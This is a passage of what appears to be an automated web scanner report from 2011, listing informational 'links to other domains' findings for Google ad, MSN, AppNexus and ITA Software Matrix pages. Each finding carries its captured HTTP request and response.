P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 21:49:34 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3922

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://seclists.org/fulldisclosure/2011/Apr/388%26hl%3Den%26client%3Dca-pub-0078565546631069%26adU%3DRegOnline.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGnIBi2pY_ckbmLDRsTZNTjX_eIlw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.59. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-0078565546631069&output=html&h=90&slotname=2743510915&w=728&lmt=1303871408&flash=10.2.154&url=http%3A%2F%2Fseclists.org%2Ffulldisclosure%2F2011%2FApr%2F388&dt=1303854586151&bpp=2&shv=r20110420&jsv=r20110415&prev_slotnames=9829251079&correlator=1303854583065&frm=0&adk=2256736125&ga_vid=1704213550.1303854583&ga_sid=1303854583&ga_hid=204119268&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1079&bih=937&fu=0&ifi=2&dtd=35&xpc=rS8NUBKRSR&p=http%3A//seclists.org HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 21:51:43 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3974

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</IFRAME>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://va.px.invitemedia.com/goog_imp?returnType=image&key=AdImp&cost=Tbc-bgANxUYK7FrRKDZ7g_Cl_U5ya69dNKYf1A&creativeID=99390&message=eJyrVjI2VrJSsLQwMjPXUVAyNgJyTE1MjQ0sgTxDIEcpJClZNynd0a8iNNLb3K0oyNslyjy93NZWCaQcpKA0LzsvvzwPxAfpNgHSpkAaZJwJkM4rzckBMs2ATENTIwNLs1oAIHsbBA--&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=249&exchange_id=4' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe>
...[SNIP]...

19.60. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303862766&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html&dt=1303844977457&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303844977692&frm=0&adk=1607234649&ga_vid=1119198186.1303844978&ga_sid=1303844978&ga_hid=987644665&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1066&bih=938&fu=0&ifi=1&dtd=371&xpc=CigITRTQkA&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 19:09:31 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3DGoDaddy.com%26adT%3DGoDaddy%2B%25231%2Bdomain%2Bnames%26adU%3Dwww.itt-tech.edu%26adT%3DOfficial%2BSite%2BITT%2BTech%26gl%3DUS&amp;usg=AFQjCNEWI1jqN3fw-V3hq9QE1PlLqBWOJg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.61. http://lifestyle.msn.com/FeedPageFinal.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.msn.com
Path:   /FeedPageFinal.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /FeedPageFinal.aspx?page=http://realestate.msn.com HTTP/1.1
Host: lifestyle.msn.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:45:34 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 1498
Content-Length: 1498

var cntwJsonfeed='<div class="cnw"><div class="cnwhead">Must-See on MSN</div><div class="cnwbx"><a href="http://editorial.autos.msn.com/listarticle.aspx?cp-documentid=1183915&amp;icid=autos_1809&amp;G
...[SNIP]...
<div class="cnwlnk"><a href="http://msn.careerbuilder.com/Article/MSN-2608-Leadership-Management-Most-employees-are-not-loyal?ocid=xnetr2-3">Study shows most employees are not loyal</a>
...[SNIP]...
<div class="cnwlnk"><a href="http://www.bing.com/search?q=tony+larussa+daughter&amp;form=MSNXNM&amp;ocid=xnetr2-4">Bing: Bianca LaRussa becomes Raiders cheerleader</a>
...[SNIP]...

19.62. http://m.adnxs.com/tt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /tt

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /tt?member=280&inv_code=REAB01&cb=1243611902 HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 26 Apr 2011 18:39:22 GMT
Content-Length: 2278

<IFRAME SRC="http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=24736;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.147&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBSgcImrUGEI1ZUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAGx2fn8AZAB18sHoAEBqAHt0wewAQI&redirecturl2=;ord=24736?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie;sz=728x90;ord=24736;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.147&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBSgcImrUGEI1ZUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAGx2fn8AZAB18sHoAEBqAHt0wewAQI&redirecturl2=;ord=24736?"></SCRIPT><NOSCRIPT><a href="http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.147&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBSgcImrUGEI1ZUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAGx2fn8AZAB18sHoAEBqAHt0wewAQI&redirecturl2=http://ad.doubleclick.net/jump/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie4;abr=!ie5;sz=728x90;ord=24736?"><IMG SRC="http://ad.doubleclick.net/ad/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie4;abr=!ie5;sz=728x90;ord=24736?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A></NOSCRIPT></IFRAME><img src="http://exch.quantserve.com/pixel/p-03tSqaTFVs1ls.gif?media=ad&p=1.822500&r=1303843162&rand=24736&labels=_qc.imp,_imp.adserver.rtb&rtbip=74.217.61.147&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBSgcImrUGEI1ZUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAGx2fn8AZAB18sHoAEBqAHt0wewAQI" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><img src="http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1" width="1" height="1"/>

19.63. http://m.adnxs.com/tt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /tt

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /tt?member=280&inv_code=REAB01&cb=1243611902 HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 26 Apr 2011 18:39:22 GMT
Content-Length: 2226

<IFRAME SRC="http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489?"></SCRIPT><NOSCRIPT><a href="http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=http://ad.doubleclick.net/jump/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie4;abr=!ie5;sz=728x90;ord=98489?"><IMG SRC="http://ad.doubleclick.net/ad/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie4;abr=!ie5;sz=728x90;ord=98489?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A></NOSCRIPT></IFRAME><img src="http://exch.quantserve.com/pixel/p-03tSqaTFVs1ls.gif?media=ad&p=1.822500&r=1303843162&rand=98489&labels=_qc.imp,_imp.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><img src="http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1" width="1" height="1"/>

19.64. http://matrix.itasoftware.com/js/sites/matrix/nls/site_en-us.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /js/sites/matrix/nls/site_en-us.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /js/sites/matrix/nls/site_en-us.js?v07201101242 HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.10.10.1303847753

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:56:50 GMT
Server: Apache-Coyote/1.1
Expires: Thu, 04 Aug 2011 19:56:50 GMT
Cache-Control: max-age=8640000
Accept-Ranges: bytes
ETag: W/"50804-1299862394000"
Last-Modified: Fri, 11 Mar 2011 16:53:14 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Length: 50804

dojo.provide("sites.matrix.nls.site_en-us");dojo.provide("sites.matrix.nls.messages");sites.matrix.nls.messages._built=true;dojo.provide("sites.matrix.nls.messages.en_us");sites.matrix.nls.messages.en
...[SNIP]...
send your suggestion. Please try again later.","dialogs_signUp_password_confirm":"Enter your password again","dialogs_signUp_header":"Create a new account","needle_promo":"Activity data collected by <a href='http://www.needlebase.com' target='_blank'>Needle</a>
...[SNIP]...
<li><a href='http://www.getfirefox.com' target='_blank'>Firefox</a></li><li><a href='http://www.apple.com/safari/' target='_blank'>Safari</a></li><li><a href='http://www.google.com/chrome' target='_blank'>Google Chrome</a>
...[SNIP]...
<li><a href='http://www.microsoft.com/windows/internet-explorer/' target='_blank'>Internet Explorer</a>
...[SNIP]...
<li><a href='http://www.opera.com/' target='_blank'>Opera</a>
...[SNIP]...
<li><a href='http://www.getfirefox.com' target='_blank'>Firefox 2+</a></li><li><a href='http://www.apple.com/safari/' target='_blank'>Safari 3+</a></li><li><a href='http://www.google.com/chrome' target='_blank'>Google Chrome 2+</a>
...[SNIP]...
<li><a href='http://www.microsoft.com/windows/internet-explorer/' target='_blank'>Internet Explorer 8+</a>
...[SNIP]...

19.65. http://matrix.itasoftware.com/view/details  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /view/details

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /view/details?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61 HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; 